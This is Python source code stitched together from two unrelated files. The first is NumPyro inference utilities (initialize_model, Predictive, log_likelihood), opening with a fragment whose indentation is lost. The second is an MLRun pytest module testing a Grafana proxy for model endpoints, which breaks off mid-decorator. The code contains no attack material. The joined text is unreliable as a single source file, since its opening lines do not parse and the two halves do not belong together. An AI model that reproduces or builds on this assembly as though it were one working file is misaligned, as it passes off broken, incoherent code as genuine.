plate_dims = -min([0] + [frame.dim for frame in site["cond_indep_stack"]])
assert (
plate_dims >= batch_dims
), "Missing plate statement for batch dimensions at site {}".format(
site["name"]
)
def initialize_model(
    rng_key,
    model,
    *,
    init_strategy=init_to_uniform,
    dynamic_args=False,
    model_args=(),
    model_kwargs=None,
    forward_mode_differentiation=False,
    validate_grad=True,
):
    """
    (EXPERIMENTAL INTERFACE) Helper function that calls :func:`~numpyro.infer.util.get_potential_fn`
    and :func:`~numpyro.infer.util.find_valid_initial_params` under the hood
    to return a tuple of (`init_params_info`, `potential_fn`, `postprocess_fn`, `model_trace`).

    :param jax.random.PRNGKey rng_key: random number generator seed to
        sample from the prior. The returned `init_params` will have the
        batch shape ``rng_key.shape[:-1]``.
    :param model: Python callable containing Pyro primitives.
    :param callable init_strategy: a per-site initialization function.
        See :ref:`init_strategy` section for available functions.
    :param bool dynamic_args: if `True`, the `potential_fn` and
        `constraints_fn` are themselves dependent on model arguments.
        When provided a `*model_args, **model_kwargs`, they return
        `potential_fn` and `constraints_fn` callables, respectively.
    :param tuple model_args: args provided to the model.
    :param dict model_kwargs: kwargs provided to the model.
    :param bool forward_mode_differentiation: whether to use forward-mode differentiation
        or reverse-mode differentiation. By default, we use reverse mode but the forward
        mode can be useful in some cases to improve the performance. In addition, some
        control flow utility on JAX such as `jax.lax.while_loop` or `jax.lax.fori_loop`
        only supports forward-mode differentiation. See
        `JAX's The Autodiff Cookbook <https://jax.readthedocs.io/en/latest/notebooks/autodiff_cookbook.html>`_
        for more information.
    :param bool validate_grad: whether to validate gradient of the initial params.
        Defaults to True.
    :return: a namedtupe `ModelInfo` which contains the fields
        (`param_info`, `potential_fn`, `postprocess_fn`, `model_trace`), where
        `param_info` is a namedtuple `ParamInfo` containing values from the prior
        used to initiate MCMC, their corresponding potential energy, and their gradients;
        `postprocess_fn` is a callable that uses inverse transforms
        to convert unconstrained HMC samples to constrained values that
        lie within the site's support, in addition to returning values
        at `deterministic` sites in the model.
    """
    model_kwargs = {} if model_kwargs is None else model_kwargs
    # Seed the model (first key when `rng_key` is batched) and substitute
    # initial values from `init_strategy`, then trace it once.
    substituted_model = substitute(
        seed(model, rng_key if jnp.ndim(rng_key) == 1 else rng_key[0]),
        substitute_fn=init_strategy,
    )
    (
        inv_transforms,
        replay_model,
        has_enumerate_support,
        model_trace,
    ) = _get_model_transforms(substituted_model, model_args, model_kwargs)
    # substitute param sites from model_trace to model so
    # we don't need to generate again parameters of `numpyro.module`
    model = substitute(
        model,
        data={
            k: site["value"]
            for k, site in model_trace.items()
            if site["type"] in ["param"]
        },
    )
    # constrained draws of continuous latent sites, used below as the prototype
    # for the unconstrained parameter pytree
    constrained_values = {
        k: v["value"]
        for k, v in model_trace.items()
        if v["type"] == "sample" and not v["is_observed"] and not v["fn"].is_discrete
    }
    if has_enumerate_support:
        from numpyro.contrib.funsor import config_enumerate, enum

        if not isinstance(model, enum):
            max_plate_nesting = _guess_max_plate_nesting(model_trace)
            _validate_model(model_trace)
            # wrap the model so discrete latent sites are enumerated in parallel
            model = enum(config_enumerate(model), -max_plate_nesting - 1)
    potential_fn, postprocess_fn = get_potential_fn(
        model,
        inv_transforms,
        replay_model=replay_model,
        enum=has_enumerate_support,
        dynamic_args=dynamic_args,
        model_args=model_args,
        model_kwargs=model_kwargs,
    )
    init_strategy = (
        init_strategy if isinstance(init_strategy, partial) else init_strategy()
    )
    # `init_to_value` specifies constrained values; convert them once to
    # unconstrained space so initialization can skip re-tracing the model.
    if (init_strategy.func is init_to_value) and not replay_model:
        init_values = init_strategy.keywords.get("values")
        unconstrained_values = transform_fn(inv_transforms, init_values, invert=True)
        init_strategy = _init_to_unconstrained_value(values=unconstrained_values)
    prototype_params = transform_fn(inv_transforms, constrained_values, invert=True)
    (init_params, pe, grad), is_valid = find_valid_initial_params(
        rng_key,
        substitute(
            model,
            data={
                k: site["value"]
                for k, site in model_trace.items()
                if site["type"] in ["plate"]
            },
        ),
        init_strategy=init_strategy,
        enum=has_enumerate_support,
        model_args=model_args,
        model_kwargs=model_kwargs,
        prototype_params=prototype_params,
        forward_mode_differentiation=forward_mode_differentiation,
        validate_grad=validate_grad,
    )
    if not_jax_tracer(is_valid):
        if device_get(~jnp.all(is_valid)):
            # Initialization failed: re-run with validation enabled to surface
            # the offending site(s) before raising.
            with numpyro.validation_enabled(), trace() as tr:
                # validate parameters
                substituted_model(*model_args, **model_kwargs)
                # validate values
                for site in tr.values():
                    if site["type"] == "sample":
                        with warnings.catch_warnings(record=True) as ws:
                            site["fn"]._validate_sample(site["value"])
                        if len(ws) > 0:
                            for w in ws:
                                # add site information to the warning message
                                w.message.args = (
                                    "Site {}: {}".format(
                                        site["name"], w.message.args[0]
                                    ),
                                ) + w.message.args[1:]
                                warnings.showwarning(
                                    w.message,
                                    w.category,
                                    w.filename,
                                    w.lineno,
                                    file=w.file,
                                    line=w.line,
                                )
            raise RuntimeError(
                "Cannot find valid initial parameters. Please check your model again."
            )
    return ModelInfo(
        ParamInfo(init_params, pe, grad), potential_fn, postprocess_fn, model_trace
    )
def _predictive(
    rng_key,
    model,
    posterior_samples,
    batch_shape,
    return_sites=None,
    infer_discrete=False,
    parallel=True,
    model_args=(),
    model_kwargs=None,
):
    """
    Draw one predictive sample per element of ``batch_shape`` from ``model``,
    conditioned on ``posterior_samples``.

    :param rng_key: PRNG key (or a batch of keys matching ``batch_shape``).
    :param model: callable containing NumPyro primitives.
    :param dict posterior_samples: latent samples with leading ``batch_shape``.
    :param tuple batch_shape: leading batch shape of the posterior samples.
    :param return_sites: site names to keep; ``""`` is a special signal to keep
        everything except plate sites, ``None`` keeps non-conditioned sample
        sites plus deterministic sites.
    :param bool infer_discrete: sample discrete latent sites from the posterior
        (requires funsor).
    :param bool parallel: vectorize predictions instead of looping.
    :param tuple model_args: args forwarded to the model.
    :param dict model_kwargs: kwargs forwarded to the model. Defaults to ``{}``.
        (FIX: previously this defaulted to a shared mutable ``{}``; a ``None``
        sentinel avoids the mutable-default-argument pitfall with identical
        behavior for all callers.)
    :return: dict of predictive samples keyed by site name.
    """
    model_kwargs = {} if model_kwargs is None else model_kwargs
    # Mask observed log-probabilities so conditioning data doesn't affect sampling.
    masked_model = numpyro.handlers.mask(model, mask=False)
    if infer_discrete:
        # inspect the model to get some structure: trace once with a single
        # prototype sample to determine the first available enumeration dim
        rng_key, subkey = random.split(rng_key)
        batch_ndim = len(batch_shape)
        prototype_sample = tree_map(
            lambda x: jnp.reshape(x, (-1,) + jnp.shape(x)[batch_ndim:])[0],
            posterior_samples,
        )
        prototype_trace = trace(
            seed(substitute(masked_model, prototype_sample), subkey)
        ).get_trace(*model_args, **model_kwargs)
        first_available_dim = -_guess_max_plate_nesting(prototype_trace) - 1

    def single_prediction(val):
        # One prediction given a (key, latent-sample) pair.
        rng_key, samples = val
        if infer_discrete:
            from numpyro.contrib.funsor import config_enumerate
            from numpyro.contrib.funsor.discrete import _sample_posterior

            model_trace = prototype_trace
            temperature = 1
            pred_samples = _sample_posterior(
                config_enumerate(condition(model, samples)),
                first_available_dim,
                temperature,
                rng_key,
                *model_args,
                **model_kwargs,
            )
        else:
            model_trace = trace(
                seed(substitute(masked_model, samples), rng_key)
            ).get_trace(*model_args, **model_kwargs)
            pred_samples = {name: site["value"] for name, site in model_trace.items()}
        if return_sites is not None:
            if return_sites == "":
                # special signal: return all sites except plates
                sites = {
                    k for k, site in model_trace.items() if site["type"] != "plate"
                }
            else:
                sites = return_sites
        else:
            # default: non-conditioned sample sites and deterministic sites
            sites = {
                k
                for k, site in model_trace.items()
                if (site["type"] == "sample" and k not in samples)
                or (site["type"] == "deterministic")
            }
        return {name: value for name, value in pred_samples.items() if name in sites}

    num_samples = int(np.prod(batch_shape))
    if num_samples > 1:
        rng_key = random.split(rng_key, num_samples)
    # reshape the key array so it zips with the batched posterior samples
    rng_key = rng_key.reshape(batch_shape + (2,))
    chunk_size = num_samples if parallel else 1
    return soft_vmap(
        single_prediction, (rng_key, posterior_samples), len(batch_shape), chunk_size
    )
class Predictive(object):
    """
    This class is used to construct predictive distribution. The predictive distribution is obtained
    by running model conditioned on latent samples from `posterior_samples`.

    .. warning::
        The interface for the `Predictive` class is experimental, and
        might change in the future.

    :param model: Python callable containing Pyro primitives.
    :param dict posterior_samples: dictionary of samples from the posterior.
    :param callable guide: optional guide to get posterior samples of sites not present
        in `posterior_samples`.
    :param dict params: dictionary of values for param sites of model/guide.
    :param int num_samples: number of samples
    :param list return_sites: sites to return; by default only sample sites not present
        in `posterior_samples` are returned.
    :param bool infer_discrete: whether or not to sample discrete sites from the
        posterior, conditioned on observations and other latent values in
        ``posterior_samples``. Under the hood, those sites will be marked with
        ``site["infer"]["enumerate"] = "parallel"``. See how `infer_discrete` works at
        the `Pyro enumeration tutorial <https://pyro.ai/examples/enumeration.html>`_.
        Note that this requires ``funsor`` installation.
    :param bool parallel: whether to predict in parallel using JAX vectorized map :func:`jax.vmap`.
        Defaults to False.
    :param batch_ndims: the number of batch dimensions in posterior samples. Some usages:

        + set `batch_ndims=0` to get prediction for 1 single sample

        + set `batch_ndims=1` to get prediction for `posterior_samples`
          with shapes `(num_samples x ...)`

        + set `batch_ndims=2` to get prediction for `posterior_samples`
          with shapes `(num_chains x N x ...)`. Note that if `num_samples`
          argument is not None, its value should be equal to `num_chains x N`.

    :return: dict of samples from the predictive distribution.

    **Example:**

    Given a model::

        def model(X, y=None):
            ...
            return numpyro.sample("obs", likelihood, obs=y)

    you can sample from the prior predictive::

        predictive = Predictive(model, num_samples=1000)
        y_pred = predictive(rng_key, X)["obs"]

    If you also have posterior samples, you can sample from the posterior predictive::

        predictive = Predictive(model, posterior_samples=posterior_samples)
        y_pred = predictive(rng_key, X)["obs"]

    See docstrings for :class:`~numpyro.infer.svi.SVI` and :class:`~numpyro.infer.mcmc.MCMCKernel`
    to see example code of this in context.
    """

    def __init__(
        self,
        model,
        posterior_samples=None,
        *,
        guide=None,
        params=None,
        num_samples=None,
        return_sites=None,
        infer_discrete=False,
        parallel=False,
        batch_ndims=1,
    ):
        if posterior_samples is None and num_samples is None:
            raise ValueError(
                "Either posterior_samples or num_samples must be specified."
            )
        posterior_samples = {} if posterior_samples is None else posterior_samples
        # Validate that every posterior site shares the same leading batch shape
        # and derive `num_samples` / `batch_shape` from it.
        prototype_site = batch_shape = batch_size = None
        for name, sample in posterior_samples.items():
            if batch_shape is not None and sample.shape[:batch_ndims] != batch_shape:
                raise ValueError(
                    f"Batch shapes at site {name} and {prototype_site} "
                    f"should be the same, but got "
                    f"{sample.shape[:batch_ndims]} and {batch_shape}"
                )
            else:
                prototype_site = name
                batch_shape = sample.shape[:batch_ndims]
                batch_size = int(np.prod(batch_shape))
                if (num_samples is not None) and (num_samples != batch_size):
                    # Posterior samples win over an inconsistent `num_samples`.
                    warnings.warn(
                        "Sample's batch dimension size {} is different from the "
                        "provided {} num_samples argument. Defaulting to {}.".format(
                            batch_size, num_samples, batch_size
                        ),
                        UserWarning,
                    )
                num_samples = batch_size
        if num_samples is None:
            raise ValueError(
                "No sample sites in posterior samples to infer `num_samples`."
            )
        if batch_shape is None:
            # No posterior samples given: draw `num_samples` from the prior.
            batch_shape = (1,) * (batch_ndims - 1) + (num_samples,)
        if return_sites is not None:
            assert isinstance(return_sites, (list, tuple, set))
        # model/guide callables and their param-site values
        self.model = model
        self.posterior_samples = {} if posterior_samples is None else posterior_samples
        self.num_samples = num_samples
        self.guide = guide
        self.params = {} if params is None else params
        # prediction options (see class docstring)
        self.infer_discrete = infer_discrete
        self.return_sites = return_sites
        self.parallel = parallel
        self.batch_ndims = batch_ndims
        # leading batch shape shared by all posterior samples
        self._batch_shape = batch_shape

    def __call__(self, rng_key, *args, **kwargs):
        """
        Returns dict of samples from the predictive distribution. By default, only sample sites not
        contained in `posterior_samples` are returned. This can be modified by changing the
        `return_sites` keyword argument of this :class:`Predictive` instance.

        :param jax.random.PRNGKey rng_key: random key to draw samples.
        :param args: model arguments.
        :param kwargs: model kwargs.
        """
        posterior_samples = self.posterior_samples
        if self.guide is not None:
            rng_key, guide_rng_key = random.split(rng_key)
            # use return_sites='' as a special signal to return all sites
            guide = substitute(self.guide, self.params)
            # First draw the missing latent sites from the guide, then feed
            # them to the model below.
            posterior_samples = _predictive(
                guide_rng_key,
                guide,
                posterior_samples,
                self._batch_shape,
                return_sites="",
                parallel=self.parallel,
                model_args=args,
                model_kwargs=kwargs,
            )
        model = substitute(self.model, self.params)
        return _predictive(
            rng_key,
            model,
            posterior_samples,
            self._batch_shape,
            return_sites=self.return_sites,
            infer_discrete=self.infer_discrete,
            parallel=self.parallel,
            model_args=args,
            model_kwargs=kwargs,
        )
def log_likelihood(
    model, posterior_samples, *args, parallel=False, batch_ndims=1, **kwargs
):
    """
    (EXPERIMENTAL INTERFACE) Returns log likelihood at observation nodes of model,
    given samples of all latent variables.

    :param model: Python callable containing Pyro primitives.
    :param dict posterior_samples: dictionary of samples from the posterior.
    :param args: model arguments.
    :param batch_ndims: the number of batch dimensions in posterior samples. Some usages:

        + set `batch_ndims=0` to get log likelihoods for 1 single sample

        + set `batch_ndims=1` to get log likelihoods for `posterior_samples`
          with shapes `(num_samples x ...)`

        + set `batch_ndims=2` to get log likelihoods for `posterior_samples`
          with shapes `(num_chains x num_samples x ...)`

    :param kwargs: model kwargs.
    :return: dict of log likelihoods at observation sites.
    """

    def single_loglik(samples):
        # Condition the model on one set of latent samples and score observations.
        conditioned = (
            substitute(model, samples) if isinstance(samples, dict) else model
        )
        tr = trace(conditioned).get_trace(*args, **kwargs)
        return {
            name: site["fn"].log_prob(site["value"])
            for name, site in tr.items()
            if site["type"] == "sample" and site["is_observed"]
        }

    # Validate that every posterior site shares the same leading batch shape.
    prototype_site = batch_shape = None
    for name, sample in posterior_samples.items():
        sample_batch = jnp.shape(sample)[:batch_ndims]
        if batch_shape is not None and sample_batch != batch_shape:
            raise ValueError(
                f"Batch shapes at site {name} and {prototype_site} "
                f"should be the same, but got "
                f"{sample.shape[:batch_ndims]} and {batch_shape}"
            )
        else:
            prototype_site, batch_shape = name, sample_batch
    if batch_shape is None:  # posterior_samples is an empty dict
        batch_shape = (1,) * batch_ndims
        posterior_samples = np.zeros(batch_shape)
    batch_size = int(np.prod(batch_shape))
    chunk_size = batch_size if parallel else 1
    return soft_vmap(single_loglik, posterior_samples, len(batch_shape), chunk_size)
@contextmanager
def helpful_support_errors(site, raise_warnings=False):
    """Context manager that augments support-related errors for a sample site:
    warns up-front about problematic (circular) supports and converts opaque
    ``NotImplementedError``s into actionable ``ValueError`` messages."""
    name = site["name"]
    support = getattr(site["fn"], "support", None)
    if isinstance(support, constraints.independent):
        support = support.base_constraint

    # Warnings
    if raise_warnings and support is constraints.circular:
        warnings.warn(
            f"Continuous inference poorly handles circular sample site '{name}'. "
            "Consider using VonMises distribution together with "
            "a reparameterizer, e.g. "
            f"numpyro.handlers.reparam(config={{'{name}': CircularReparam()}}).",
            UserWarning,
        )

    # Exceptions
    try:
        yield
    except NotImplementedError as e:
        support_name = repr(support).lower()
        if "integer" in support_name or "boolean" in support_name:
            # TODO: mention enumeration when it is supported in SVI
            raise ValueError(
                f"Continuous inference cannot handle discrete sample site '{name}'."
            )
        if "sphere" in support_name:
            raise ValueError(
                f"Continuous inference cannot handle spherical sample site '{name}'. "
                "Consider using ProjectedNormal distribution together with "
                "a reparameterizer, e.g. "
                f"numpyro.handlers.reparam(config={{'{name}': ProjectedNormalReparam()}})."
            )
        raise e from None
|
import os
from datetime import datetime, timedelta
from random import randint
from typing import Optional
import pandas as pd
import pytest
from fastapi.testclient import TestClient
from pytest import fail
from sqlalchemy.orm import Session
from v3io.dataplane import RaiseForStatus
from v3io_frames import CreateError
from v3io_frames import frames_pb2 as fpb2
from mlrun.api.api.endpoints.grafana_proxy import (
_parse_query_parameters,
_validate_query_parameters,
)
from mlrun.api.crud.model_endpoints import (
ENDPOINTS,
EVENTS,
ModelEndpoints,
write_endpoint_to_kv,
)
from mlrun.config import config
from mlrun.errors import MLRunBadRequestError
from mlrun.utils.model_monitoring import parse_model_endpoint_store_prefix
from mlrun.utils.v3io_clients import get_frames_client, get_v3io_client
from tests.api.api.test_model_endpoints import _mock_random_endpoint
# Environment variables required to reach a live V3IO backend; tests below are
# skipped when any of them is unset.
ENV_PARAMS = {"V3IO_ACCESS_KEY", "V3IO_API", "V3IO_FRAMESD"}
# Project name under which mock endpoints are written during these tests.
TEST_PROJECT = "test3"
def _build_skip_message():
    """Return the pytest skip reason listing the required V3IO env variables."""
    # FIX: the joined separator previously reused the enclosing f-string's
    # double quotes (f"...({", ".join(...)})"), which is a SyntaxError on
    # Python < 3.12 (same-quote nesting inside f-strings is only allowed by
    # PEP 701). Use single quotes for the separator instead.
    return (
        "One of the required environment params is not initialized "
        f"({', '.join(ENV_PARAMS)})"
    )
def _is_env_params_dont_exist() -> bool:
    """Return True when at least one required V3IO env variable is unset."""
    return any(not os.environ.get(param, False) for param in ENV_PARAMS)
def test_grafana_proxy_model_endpoints_check_connection(
    db: Session, client: TestClient
):
    """Smoke test: the grafana-proxy health endpoint answers 200 even with a
    fake access key (no V3IO round-trip required)."""
    headers = {"X-V3io-Session-Key": "fake-access-key"}
    response = client.get(
        url="/api/grafana-proxy/model-endpoints",
        headers=headers,
    )
    assert response.status_code == 200
@pytest.mark.skipif(
    _is_env_params_dont_exist(), reason=_build_skip_message(),
)
def test_grafana_list_endpoints(db: Session, client: TestClient):
    """Write five mock endpoints to KV and verify the Grafana proxy's
    `list_endpoints` target returns a table response listing all of them."""
    endpoints_in = [_mock_random_endpoint("active") for _ in range(5)]
    for endpoint in endpoints_in:
        write_endpoint_to_kv(_get_access_key(), endpoint)

    response = client.post(
        url="/api/grafana-proxy/model-endpoints/query",
        headers={"X-V3io-Session-Key": _get_access_key()},
        json={
            "targets": [
                {"target": f"project={TEST_PROJECT};target_endpoint=list_endpoints"}
            ]
        },
    )

    response_json = response.json()
    if not response_json:
        fail(f"Empty response, expected list of dictionaries. {response_json}")

    response_json = response_json[0]
    if not response_json:
        fail(
            f"Empty dictionary, expected dictionary with 'columns', 'rows' and 'type' fields. {response_json}"
        )

    # A Grafana "table" response must carry these three keys.
    for key in ("columns", "rows", "type"):
        if key not in response_json:
            fail(f"Missing '{key}' key in response dictionary. {response_json}")

    assert len(response_json["rows"]) == 5
@pytest.mark.skipif(
    _is_env_params_dont_exist(), reason=_build_skip_message(),
)
def test_grafana_individual_feature_analysis(db: Session, client: TestClient):
    """Per-feature analysis returns one row for each of the endpoint's features.

    Seeds a fully populated endpoint record (including current_stats) directly
    into the V3IO KV store, then queries the proxy's
    individual_feature_analysis target.
    """
    # Pre-baked KV record; feature_stats / current_stats / drift_measures are
    # JSON-encoded strings, exactly as the monitoring pipeline stores them.
    endpoint_data = {
        "timestamp": "2021-02-28 21:02:58.642108",
        "project": TEST_PROJECT,
        "model": "test-model",
        "function": "v2-model-server",
        "tag": "latest",
        "model_class": "ClassifierModel",
        "endpoint_id": "test.test_id",
        "labels": "null",
        "latency_avg_1s": 42427.0,
        "predictions_per_second_count_1s": 141,
        "first_request": "2021-02-28 21:02:58.642108",
        "last_request": "2021-02-28 21:02:58.642108",
        "error_count": 0,
        "feature_names": '["sepal length (cm)", "sepal width (cm)", "petal length (cm)", "petal width (cm)"]',
        "feature_stats": '{"sepal length (cm)": {"count": 30, "mean": 5.946666666666668, "std": 0.8394305678023165, "min": 4.7, "max": 7.9, "hist": [[4, 4, 4, 4, 4, 3, 4, 0, 3, 4, 1, 1, 2, 1, 0, 1, 0, 0, 1, 1], [4.7, 4.86, 5.0200000000000005, 5.18, 5.34, 5.5, 5.66, 5.82, 5.98, 6.140000000000001, 6.300000000000001, 6.46, 6.62, 6.78, 6.94, 7.1, 7.26, 7.42, 7.58, 7.74, 7.9]]}, "sepal width (cm)": {"count": 30, "mean": 3.119999999999999, "std": 0.4088672324766359, "min": 2.2, "max": 3.8, "hist": [[1, 1, 1, 1, 1, 1, 1, 1, 2, 0, 3, 3, 2, 2, 0, 3, 1, 1, 0, 4], [2.2, 2.2800000000000002, 2.3600000000000003, 2.44, 2.52, 2.6, 2.68, 2.7600000000000002, 2.84, 2.92, 3, 3.08, 3.16, 3.24, 3.3200000000000003, 3.4, 3.48, 3.56, 3.6399999999999997, 3.7199999999999998, 3.8]]}, "petal length (cm)": {"count": 30, "mean": 3.863333333333333, "std": 1.8212317418360753, "min": 1.3, "max": 6.7, "hist": [[6, 6, 6, 6, 6, 6, 0, 0, 1, 2, 0, 3, 3, 2, 2, 3, 1, 1, 1, 1], [1.3, 1.57, 1.84, 2.1100000000000003, 2.38, 2.6500000000000004, 2.92, 3.1900000000000004, 3.46, 3.7300000000000004, 4, 4.2700000000000005, 4.54, 4.8100000000000005, 5.08, 5.3500000000000005, 5.62, 5.89, 6.16, 6.430000000000001, 6.7]]}, "petal width (cm)": {"count": 30, "mean": 1.2733333333333334, "std": 0.8291804567674381, "min": 0.1, "max": 2.5, "hist": [[5, 5, 5, 5, 5, 5, 0, 0, 1, 2, 3, 2, 1, 0, 2, 3, 1, 1, 0, 4], [0.1, 0.22, 0.33999999999999997, 0.45999999999999996, 0.58, 0.7, 0.82, 0.94, 1.06, 1.1800000000000002, 1.3, 1.42, 1.54, 1.6600000000000001, 1.78, 1.9, 2.02, 2.14, 2.2600000000000002, 2.38, 2.5]]}}',  # noqa
        "current_stats": '{"petal length (cm)": {"count": 100.0, "mean": 2.861, "std": 1.4495485190537463, "min": 1.0, "max": 5.1, "hist": [[4, 20, 20, 4, 2, 0, 0, 0, 0, 1, 0, 2, 3, 2, 8, 7, 6, 10, 7, 4], [1.0, 1.205, 1.41, 1.615, 1.8199999999999998, 2.025, 2.23, 2.4349999999999996, 2.6399999999999997, 2.8449999999999998, 3.05, 3.255, 3.46, 3.665, 3.8699999999999997, 4.074999999999999, 4.279999999999999, 4.484999999999999, 4.6899999999999995, 4.895, 5.1]]}, "petal width (cm)": {"count": 100.0, "mean": 5.471000000000001, "std": 0.6416983463254116, "min": 4.3, "max": 7.0, "hist": [[4, 1, 6, 5, 5, 19, 4, 1, 13, 5, 7, 6, 4, 4, 5, 2, 1, 5, 1, 2], [4.3, 4.435, 4.57, 4.705, 4.84, 4.975, 5.109999999999999, 5.245, 5.38, 5.515, 5.65, 5.785, 5.92, 6.055, 6.1899999999999995, 6.325, 6.46, 6.595, 6.73, 6.865, 7.0]]}, "sepal length (cm)": {"count": 100.0, "mean": 0.7859999999999998, "std": 0.5651530587354012, "min": 0.1, "max": 1.8, "hist": [[5, 29, 7, 7, 1, 1, 0, 0, 0, 0, 7, 3, 5, 0, 13, 7, 10, 3, 1, 1], [0.1, 0.185, 0.27, 0.355, 0.43999999999999995, 0.5249999999999999, 0.61, 0.695, 0.7799999999999999, 0.8649999999999999, 0.9499999999999998, 1.035, 1.12, 1.205, 1.29, 1.375, 1.46, 1.545, 1.63, 1.7149999999999999, 1.8]]}, "sepal width (cm)": {"count": 100.0, "mean": 3.0989999999999998, "std": 0.4787388735948953, "min": 2.0, "max": 4.4, "hist": [[1, 2, 4, 3, 4, 8, 6, 8, 14, 7, 11, 10, 6, 3, 7, 2, 1, 1, 1, 1], [2.0, 2.12, 2.24, 2.3600000000000003, 2.48, 2.6, 2.72, 2.8400000000000003, 2.96, 3.08, 3.2, 3.3200000000000003, 3.4400000000000004, 3.5600000000000005, 3.6800000000000006, 3.8000000000000003, 3.9200000000000004, 4.040000000000001, 4.16, 4.28, 4.4]]}}',  # noqa
        "drift_measures": '{"petal width (cm)": {"tvd": 0.4, "hellinger": 0.38143130942893605, "kld": 1.3765624725652992}, "tvd_sum": 1.755886699507389, "tvd_mean": 0.43897167487684724, "hellinger_sum": 1.7802062191831514, "hellinger_mean": 0.44505155479578784, "kld_sum": 9.133613874253776, "kld_mean": 2.283403468563444, "sepal width (cm)": {"tvd": 0.3551724137931034, "hellinger": 0.4024622641158891, "kld": 1.7123635755188409}, "petal length (cm)": {"tvd": 0.445, "hellinger": 0.39975075965755447, "kld": 1.6449612084377268}, "sepal length (cm)": {"tvd": 0.5557142857142856, "hellinger": 0.5965618859807716, "kld": 4.399726617731908}}',  # noqa
    }
    # Write the record straight into the KV table the proxy reads from.
    v3io = get_v3io_client(endpoint=config.v3io_api, access_key=_get_access_key())
    v3io.kv.put(
        container="projects",
        table_path=f"{TEST_PROJECT}/model-endpoints/endpoints",
        key="test.test_id",
        attributes=endpoint_data,
    )
    response = client.post(
        url="/api/grafana-proxy/model-endpoints/query",
        headers={"X-V3io-Session-Key": _get_access_key()},
        json={
            "targets": [
                {
                    "target": f"project={TEST_PROJECT};endpoint_id=test.test_id;target_endpoint=individual_feature_analysis"  # noqa
                }
            ]
        },
    )
    assert response.status_code == 200
    response_json = response.json()
    assert len(response_json) == 1
    assert "columns" in response_json[0]
    assert "rows" in response_json[0]
    # Four feature names -> four analysis rows.
    assert len(response_json[0]["rows"]) == 4
@pytest.mark.skipif(
    _is_env_params_dont_exist(), reason=_build_skip_message(),
)
def test_grafana_individual_feature_analysis_missing_field_doesnt_fail(
    db: Session, client: TestClient
):
    """Analysis still succeeds when the record lacks the current_stats field.

    Same setup as test_grafana_individual_feature_analysis, but the seeded
    endpoint record deliberately omits "current_stats"; the proxy should fill
    the corresponding row cells with None instead of failing.
    """
    endpoint_data = {
        "timestamp": "2021-02-28 21:02:58.642108",
        "project": TEST_PROJECT,
        "model": "test-model",
        "function": "v2-model-server",
        "tag": "latest",
        "model_class": "ClassifierModel",
        "endpoint_id": "test.test_id",
        "labels": "null",
        "latency_avg_1s": 42427.0,
        "predictions_per_second_count_1s": 141,
        "first_request": "2021-02-28 21:02:58.642108",
        "last_request": "2021-02-28 21:02:58.642108",
        "error_count": 0,
        "feature_names": '["sepal length (cm)", "sepal width (cm)", "petal length (cm)", "petal width (cm)"]',
        "feature_stats": '{"sepal length (cm)": {"count": 30, "mean": 5.946666666666668, "std": 0.8394305678023165, "min": 4.7, "max": 7.9, "hist": [[4, 4, 4, 4, 4, 3, 4, 0, 3, 4, 1, 1, 2, 1, 0, 1, 0, 0, 1, 1], [4.7, 4.86, 5.0200000000000005, 5.18, 5.34, 5.5, 5.66, 5.82, 5.98, 6.140000000000001, 6.300000000000001, 6.46, 6.62, 6.78, 6.94, 7.1, 7.26, 7.42, 7.58, 7.74, 7.9]]}, "sepal width (cm)": {"count": 30, "mean": 3.119999999999999, "std": 0.4088672324766359, "min": 2.2, "max": 3.8, "hist": [[1, 1, 1, 1, 1, 1, 1, 1, 2, 0, 3, 3, 2, 2, 0, 3, 1, 1, 0, 4], [2.2, 2.2800000000000002, 2.3600000000000003, 2.44, 2.52, 2.6, 2.68, 2.7600000000000002, 2.84, 2.92, 3, 3.08, 3.16, 3.24, 3.3200000000000003, 3.4, 3.48, 3.56, 3.6399999999999997, 3.7199999999999998, 3.8]]}, "petal length (cm)": {"count": 30, "mean": 3.863333333333333, "std": 1.8212317418360753, "min": 1.3, "max": 6.7, "hist": [[6, 6, 6, 6, 6, 6, 0, 0, 1, 2, 0, 3, 3, 2, 2, 3, 1, 1, 1, 1], [1.3, 1.57, 1.84, 2.1100000000000003, 2.38, 2.6500000000000004, 2.92, 3.1900000000000004, 3.46, 3.7300000000000004, 4, 4.2700000000000005, 4.54, 4.8100000000000005, 5.08, 5.3500000000000005, 5.62, 5.89, 6.16, 6.430000000000001, 6.7]]}, "petal width (cm)": {"count": 30, "mean": 1.2733333333333334, "std": 0.8291804567674381, "min": 0.1, "max": 2.5, "hist": [[5, 5, 5, 5, 5, 5, 0, 0, 1, 2, 3, 2, 1, 0, 2, 3, 1, 1, 0, 4], [0.1, 0.22, 0.33999999999999997, 0.45999999999999996, 0.58, 0.7, 0.82, 0.94, 1.06, 1.1800000000000002, 1.3, 1.42, 1.54, 1.6600000000000001, 1.78, 1.9, 2.02, 2.14, 2.2600000000000002, 2.38, 2.5]]}}',  # noqa
        "drift_measures": '{"petal width (cm)": {"tvd": 0.4, "hellinger": 0.38143130942893605, "kld": 1.3765624725652992}, "tvd_sum": 1.755886699507389, "tvd_mean": 0.43897167487684724, "hellinger_sum": 1.7802062191831514, "hellinger_mean": 0.44505155479578784, "kld_sum": 9.133613874253776, "kld_mean": 2.283403468563444, "sepal width (cm)": {"tvd": 0.3551724137931034, "hellinger": 0.4024622641158891, "kld": 1.7123635755188409}, "petal length (cm)": {"tvd": 0.445, "hellinger": 0.39975075965755447, "kld": 1.6449612084377268}, "sepal length (cm)": {"tvd": 0.5557142857142856, "hellinger": 0.5965618859807716, "kld": 4.399726617731908}}',  # noqa
    }
    v3io = get_v3io_client(endpoint=config.v3io_api, access_key=_get_access_key())
    v3io.kv.put(
        container="projects",
        table_path=f"{TEST_PROJECT}/model-endpoints/endpoints",
        key="test.test_id",
        attributes=endpoint_data,
    )
    response = client.post(
        url="/api/grafana-proxy/model-endpoints/query",
        headers={"X-V3io-Session-Key": _get_access_key()},
        json={
            "targets": [
                {
                    "target": f"project={TEST_PROJECT};endpoint_id=test.test_id;target_endpoint=individual_feature_analysis"  # noqa
                }
            ]
        },
    )
    assert response.status_code == 200
    response_json = response.json()
    assert len(response_json) == 1
    assert "columns" in response_json[0]
    assert "rows" in response_json[0]
    assert len(response_json[0]["rows"]) == 4
    for row in response_json[0]["rows"]:
        # First cell (feature name) is always populated.
        assert row[0] is not None
        # Cells 1-3 are None — presumably they derive from the omitted
        # current_stats field; TODO confirm against the grafana_proxy code.
        assert all(map(lambda e: e is None, row[1:4]))
        # Remaining cells come from feature_stats/drift_measures, which were
        # provided, so they must be populated.
        assert all(map(lambda e: e is not None, row[4:10]))
@pytest.mark.skipif(
